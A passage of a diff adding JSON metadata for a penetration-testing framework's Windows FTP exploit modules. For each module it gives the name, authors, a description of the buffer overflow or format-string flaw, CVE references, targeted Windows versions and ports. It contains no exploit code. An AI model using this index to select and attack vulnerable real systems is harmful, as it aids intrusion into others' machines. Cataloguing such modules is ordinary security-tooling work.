"exploit", + "author": [ + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in AASync v2.2.1.0, triggered when\n processing the response on a LIST command. During the overflow, a structured exception\n handler record gets overwritten.", + "references": [ + "OSVDB-68701", + "EDB-16738", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "XP SP3 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/aasync_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/aasync_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/ability_server_stor": { + "name": "Ability Server 2.34 STOR Command Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/ability_server_stor", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-10-22", + "type": "exploit", + "author": [ + "muts", + "Dark Eagle", + "Peter Osterberg" + ], + "description": "This module exploits a stack-based buffer overflow in Ability Server 2.34.\n Ability Server fails to check input size when parsing 'STOR' and 'APPE' commands,\n which leads to a stack based buffer overflow. This plugin uses the 'STOR' command.\n\n The vulnerability has been confirmed on version 2.34 and has also been reported\n in version 2.25 and 2.32. Other versions may also be affected.", + "references": [ + "CVE-2004-1626", + "OSVDB-11030", + "EDB-588" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Automatic", + "Windows XP SP2 ENG", + "Windows XP SP3 ENG" + ], + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/exploits/windows/ftp/ability_server_stor.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ability_server_stor", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/absolute_ftp_list_bof": { + "name": "AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow", + "fullname": "exploit/windows/ftp/absolute_ftp_list_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-11-09", + "type": "exploit", + "author": [ + "Node" + ], + "description": "This module exploits VanDyke Software AbsoluteFTP by overflowing\n a filename buffer related to the LIST command.", + "references": [ + "CVE-2011-5164", + "OSVDB-77105", + "EDB-18102" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb", + "is_install_path": true, + "ref_name": "windows/ftp/absolute_ftp_list_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/ayukov_nftp": { + "name": "Ayukov NFTP FTP Client Buffer Overflow", + "fullname": "exploit/windows/ftp/ayukov_nftp", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-10-21", + "type": "exploit", + "author": [ + "Berk Cem Goksel", + "Daniel Teixeira", + "sinn3r " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP\n Client 2.0 and earlier. By responding with a long string of data for the SYST request, it\n is possible to cause a denail-of-service condition on the FTP client, or arbitrary remote\n code exeuction under the context of the user if successfully exploited.", + "references": [ + "CVE-2017-15222", + "EDB-43025" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Pro SP3 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/ayukov_nftp.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ayukov_nftp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/bison_ftp_bof": { + "name": "BisonWare BisonFTP Server Buffer Overflow", + "fullname": "exploit/windows/ftp/bison_ftp_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-08-07", + "type": "exploit", + "author": [ + "localh0t", + "veerendragg ", + "Jay Turla" + ], + "description": "BisonWare BisonFTP Server 3.5 is prone to an overflow condition.\n This module exploits a buffer overflow vulnerability in the said\n application.", + "references": [ + "CVE-1999-1510", + "BID-49109", + "EDB-17649", + "URL-http://secpod.org/msf/bison_server_bof.rb" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Bisonware FTP Server / Windows XP SP3 EN" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/bison_ftp_bof.rb", + "is_install_path": true, + "ref_name": "windows/ftp/bison_ftp_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/cesarftp_mkd": { + "name": "Cesar FTP 0.99g MKD Command Buffer Overflow", + "fullname": "exploit/windows/ftp/cesarftp_mkd", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-06-12", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.\n\n You must have valid credentials to trigger this vulnerability. Also, you\n only get one chance, so choose your target carefully.", + "references": [ + "CVE-2006-2961", + "OSVDB-26364", + "BID-18586", + "URL-http://web.archive.org/web/20060619195555/http://secunia.com:80/advisories/20574/" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 2000 Pro SP4 English", + "Windows 2000 Pro SP4 French", + "Windows XP SP2/SP3 English", + "Windows 2003 SP1 English" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/ftp/cesarftp_mkd.rb", + "is_install_path": true, + "ref_name": "windows/ftp/cesarftp_mkd", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/comsnd_ftpd_fmtstr": { + "name": "ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability", + "fullname": "exploit/windows/ftp/comsnd_ftpd_fmtstr", + "aliases": [], + "rank": 400, + "disclosure_date": "2012-06-08", + "type": "exploit", + "author": [ + "ChaoYi Huang ", + "rick2600 ", + "mr_me ", + "corelanc0d3r " + ], + "description": "This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially\n crafted format string specifier as a username. The crafted username is sent to the server to\n overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer\n is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.\n The SEH exit function is preferred so that the administrators are not left with an unhandled\n exception message. When using the meterpreter payload, the process will never die, allowing\n for continuous exploitation.", + "references": [ + "OSVDB-82798", + "EDB-19024" + ], + "platform": "Windows", + "arch": "x86", + "rport": 21, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP SP3 - English", + "Windows Server 2003 - English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb", + "is_install_path": true, + "ref_name": "windows/ftp/comsnd_ftpd_fmtstr", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/dreamftp_format": { + "name": "BolinTech Dream FTP Server 1.02 Format String", + "fullname": "exploit/windows/ftp/dreamftp_format", + "aliases": [], + "rank": 400, + "disclosure_date": "2004-03-03", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a format string overflow in the BolinTech\n Dream FTP Server version 1.02. Based on the exploit by SkyLined.", + "references": [ + "CVE-2004-2074", + "OSVDB-4986", + "BID-9800", + "EDB-823" + ], + "platform": "Windows", + "arch": "x86", + "rport": 21, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Dream FTP Server v1.02 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/dreamftp_format.rb", + "is_install_path": true, + "ref_name": "windows/ftp/dreamftp_format", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/easyfilesharing_pass": { + "name": "Easy File Sharing FTP Server 2.0 PASS Overflow", + "fullname": "exploit/windows/ftp/easyfilesharing_pass", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-07-31", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the Easy File Sharing 2.0\n service. By sending an overly long password, an attacker can execute\n arbitrary code.", + "references": [ + "CVE-2006-3952", + "OSVDB-27646", + "BID-19243" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 2000 Pro English ALL", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/easyfilesharing_pass.rb", + "is_install_path": true, + "ref_name": "windows/ftp/easyfilesharing_pass", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/easyftp_cwd_fixret": { + "name": "EasyFTP Server CWD Command Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/easyftp_cwd_fixret", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-02-16", + "type": "exploit", + "author": [ + "Paul Makowski ", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which\n leads to a stack based buffer overflow. EasyFTP allows anonymous access by\n default; valid credentials are typically unnecessary to exploit this vulnerability.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n This exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n 'fixing' the return address post-exploitation. See references for more information.", + "references": [ + "OSVDB-62134", + "BID-38262", + "URL-http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/", + "URL-http://paulmakowski.wordpress.com/2010/04/19/metasploit-plugin-for-easyftp-server-exploit", + "URL-https://seclists.org/bugtraq/2010/Feb/202" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows Universal - v1.7.0.2", + "Windows Universal - v1.7.0.3", + "Windows Universal - v1.7.0.4", + "Windows Universal - v1.7.0.5", + "Windows Universal - v1.7.0.6", + "Windows Universal - v1.7.0.7", + "Windows Universal - v1.7.0.8", + "Windows Universal - v1.7.0.9", + "Windows Universal - v1.7.0.10", + "Windows Universal - v1.7.0.11" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb", + "is_install_path": true, + "ref_name": "windows/ftp/easyftp_cwd_fixret", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/easyftp_list_fixret": { + "name": "EasyFTP Server LIST Command Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/easyftp_list_fixret", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-07-05", + "type": "exploit", + "author": [ + "Karn Ganeshan ", + "MFR", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.\n credit goes to Karn Ganeshan.\n\n NOTE: Although, this is likely to exploit the same vulnerability as the\n 'easyftp_cwd_fixret' exploit, it uses a slightly different vector.", + "references": [ + "OSVDB-62134", + "EDB-14400", + "EDB-14451" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows XP SP3 - Version 2002" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/easyftp_list_fixret.rb", + "is_install_path": true, + "ref_name": "windows/ftp/easyftp_list_fixret", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/easyftp_mkd_fixret": { + "name": "EasyFTP Server MKD Command Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/easyftp_mkd_fixret", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-04-04", + "type": "exploit", + "author": [ + "x90c ", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which\n leads to a stack based buffer overflow.\n\n NOTE: EasyFTP allows anonymous access by default. However, in order to access the\n 'MKD' command, you must have access to an account that can create directories.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n This exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n 'fixing' the return address post-exploitation. See references for more information.", + "references": [ + "OSVDB-62134", + "EDB-12044", + "EDB-14399" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows Universal - v1.7.0.2", + "Windows Universal - v1.7.0.3", + "Windows Universal - v1.7.0.4", + "Windows Universal - v1.7.0.5", + "Windows Universal - v1.7.0.6", + "Windows Universal - v1.7.0.7", + "Windows Universal - v1.7.0.8", + "Windows Universal - v1.7.0.9", + "Windows Universal - v1.7.0.10", + "Windows Universal - v1.7.0.11" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb", + "is_install_path": true, + "ref_name": "windows/ftp/easyftp_mkd_fixret", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/filecopa_list_overflow": { + "name": "FileCopa FTP Server Pre 18 Jul Version", + "fullname": "exploit/windows/ftp/filecopa_list_overflow", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-07-19", + "type": "exploit", + "author": [ + "Jacopo Cervini" + ], + "description": "This module exploits the buffer overflow found in the LIST command\n in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch", + "references": [ + "CVE-2006-3726", + "OSVDB-27389", + "BID-19065" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 2k Server SP4 English", + "Windows XP Pro SP2 Italian" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/filecopa_list_overflow.rb", + "is_install_path": true, + "ref_name": "windows/ftp/filecopa_list_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/filewrangler_list_reply": { + "name": "FileWrangler 5.30 Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/filewrangler_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "nullthreat", + "corelanc0d3r " + ], + "description": "This module exploits a buffer overflow in the FileWrangler client\n that is triggered when the client connects to a FTP server and lists\n the directory contents, containing an overly long directory name.", + "references": [ + "OSVDB-94555", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/filewrangler_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/filewrangler_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/freefloatftp_user": { + "name": "Free Float FTP Server USER Command Buffer Overflow", + "fullname": "exploit/windows/ftp/freefloatftp_user", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-06-12", + "type": "exploit", + "author": [ + "D35m0nd142", + "Doug Prostko " + ], + "description": "Freefloat FTP Server is prone to an overflow condition. It\n fails to properly sanitize user-supplied input resulting in a\n stack-based buffer overflow. With a specially crafted 'USER'\n command, a remote attacker can potentially have an unspecified\n impact.", + "references": [ + "OSVDB-69621", + "EDB-23243" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "FreeFloat / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/freefloatftp_user.rb", + "is_install_path": true, + "ref_name": "windows/ftp/freefloatftp_user", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/freefloatftp_wbem": { + "name": "FreeFloat FTP Server Arbitrary File Upload", + "fullname": "exploit/windows/ftp/freefloatftp_wbem", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-12-07", + "type": "exploit", + "author": [ + "sinn3r ", + "juan vazquez " + ], + "description": "This module abuses multiple issues in FreeFloat: 1. No credential is actually\n needed to login; 2. User's default path is in C:\\, and this cannot be changed;\n 3. User can write to anywhere on the server's file system. As a result of these\n poor implementations, a malicious user can just log in and then upload files,\n and let WMI (Management Instrumentation service) to execute the payload uploaded.", + "references": [ + "OSVDB-88302", + "OSVDB-88303" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "FreeFloat" + ], + "mod_time": "2021-02-18 09:18:19 +0000", + "path": "/modules/exploits/windows/ftp/freefloatftp_wbem.rb", + "is_install_path": true, + "ref_name": "windows/ftp/freefloatftp_wbem", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/ftp/freeftpd_pass": { + "name": "freeFTPd PASS Command Buffer Overflow", + "fullname": "exploit/windows/ftp/freeftpd_pass", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-08-20", + "type": "exploit", + "author": [ + "Wireghoul", + "TecR0c " + ], + "description": "freeFTPd 1.0.10 and below contains an overflow condition that is triggered as\n user-supplied input is not properly validated when handling a specially crafted\n PASS command. This may allow a remote attacker to cause a buffer overflow,\n resulting in a denial of service or allow the execution of arbitrary code.\n\n freeFTPd must have an account set to authorization anonymous user account.", + "references": [ + "OSVDB-96517", + "EDB-27747", + "BID-61905" + ], + "platform": "Windows", + "arch": "x86", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "freeFTPd 1.0.10 and below on Windows Desktop Version" + ], + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/exploits/windows/ftp/freeftpd_pass.rb", + "is_install_path": true, + "ref_name": "windows/ftp/freeftpd_pass", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/freeftpd_user": { + "name": "freeFTPd 1.0 Username Overflow", + "fullname": "exploit/windows/ftp/freeftpd_user", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-11-16", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the freeFTPd\n multi-protocol file transfer service. This flaw can only be\n exploited when logging has been enabled (non-default).", + "references": [ + "CVE-2005-3683", + "OSVDB-20909", + "BID-15457" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Automatic", + "Windows 2000 English ALL", + "Windows XP Pro SP0/SP1 English", + "Windows NT SP5/SP6a English", + "Windows 2003 Server English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/freeftpd_user.rb", + "is_install_path": true, + "ref_name": "windows/ftp/freeftpd_user", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/ftpgetter_pwd_reply": { + "name": "FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)", + "fullname": "exploit/windows/ftp/ftpgetter_pwd_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "ekse", + "corelanc0d3r " + ], + "description": "This module exploits a buffer overflow in FTPGetter Standard v3.55.0.05 ftp client.\n When processing the response on a PWD command, a stack based buffer overflow occurs.\n This leads to arbitrary code execution when a structured exception handler gets\n overwritten.", + "references": [ + "OSVDB-68638", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "XP SP3 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ftpgetter_pwd_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/ftppad_list_reply": { + "name": "FTPPad 1.2.0 Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/ftppad_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "corelanc0d3r" + ], + "description": "This module exploits a stack buffer overflow FTPPad 1.2.0 ftp client. The overflow is\n triggered when the client connects to a FTP server which sends an overly long directory\n and filename in response to a LIST command.\n\n This will cause an access violation, and will eventually overwrite the saved extended\n instruction pointer. Payload can be found at EDX+5c and ESI+5c, so a little pivot/\n sniper was needed to make this one work.", + "references": [ + "OSVDB-68714", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "XP SP3 Professional, English - shlwapi 6.00.2900.5912", + "XP SP3 Professional, German - shlwapi 6.00.2900.5912", + "XP SP3 Professional, English - shlwapi 6.00.2900.5512" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/ftppad_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ftppad_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/ftpshell51_pwd_reply": { + "name": "FTPShell 5.1 Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/ftpshell51_pwd_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets\n triggered when the ftp client tries to process an overly long response to a PWD\n command. This will overwrite the saved EIP and structured exception handler.", + "references": [ + "OSVDB-68639", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ftpshell51_pwd_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/ftpshell_cli_bof": { + "name": "FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/ftpshell_cli_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-03-04", + "type": "exploit", + "author": [ + "r4wd3r", + "Daniel Teixeira" + ], + "description": "This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise\n edition) allowing remote code execution.", + "references": [ + "CVE-2018-7573", + "EDB-44596" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/ftpshell_cli_bof.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ftpshell_cli_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/ftpsynch_list_reply": { + "name": "FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/ftpsynch_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "myne-us", + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow vulnerability in FTP Synchronizer Pro\n version 4.0.73.274 The overflow gets triggered by sending an overly long filename to\n the client in response to a LIST command.\n The LIST command gets issued when doing a preview or when you have just created a new\n sync profile and allow the tool to see the differences.\n This will overwrite a structured exception handler and trigger an access violation.", + "references": [ + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/ftpsynch_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ftpsynch_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/gekkomgr_list_reply": { + "name": "Gekko Manager FTP Client Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/gekkomgr_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "nullthreat", + "corelanc0d3r " + ], + "description": "This module exploits a buffer overflow in Gekko Manager ftp client, triggered when\n processing the response received after sending a LIST request. If this response contains\n a long filename, a buffer overflow occurs, overwriting a structured exception handler.", + "references": [ + "OSVDB-68641", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "XP SP3 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/gekkomgr_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/gekkomgr_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/globalscapeftp_input": { + "name": "GlobalSCAPE Secure FTP Server Input Overflow", + "fullname": "exploit/windows/ftp/globalscapeftp_input", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-05-01", + "type": "exploit", + "author": [ + "Fairuzan Roslan ", + "Mati Aharoni " + ], + "description": "This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.\n All versions prior to 3.0.3 are affected by this flaw. A valid user account (\n or anonymous access) is required for this exploit to work.", + "references": [ + "CVE-2005-1415", + "OSVDB-16049", + "BID-13454", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "GlobalSCAPE Secure FTP Server <= 3.0.2 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/globalscapeftp_input.rb", + "is_install_path": true, + "ref_name": "windows/ftp/globalscapeftp_input", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/goldenftp_pass_bof": { + "name": "GoldenFTP PASS Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/goldenftp_pass_bof", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-01-23", + "type": "exploit", + "author": [ + "Craig Freyman", + "bannedit ", + "Joff Thyer " + ], + "description": "This module exploits a vulnerability in the Golden FTP service, using the PASS\n command to cause a buffer overflow. Please note that in order trigger the vulnerable\n code, the victim machine must have the \"Show new connections\" setting enabled. By\n default, this option is unchecked.", + "references": [ + "CVE-2006-6576", + "OSVDB-35951", + "BID-45957", + "EDB-16036" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Automatic", + "Windows XP Pro SP3", + "Windows XP Pro SP2", + "Windows XP Pro SP0/SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/goldenftp_pass_bof.rb", + "is_install_path": true, + "ref_name": "windows/ftp/goldenftp_pass_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/httpdx_tolog_format": { + "name": "HTTPDX tolog() Function Format String Vulnerability", + "fullname": "exploit/windows/ftp/httpdx_tolog_format", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-11-17", + "type": "exploit", + "author": 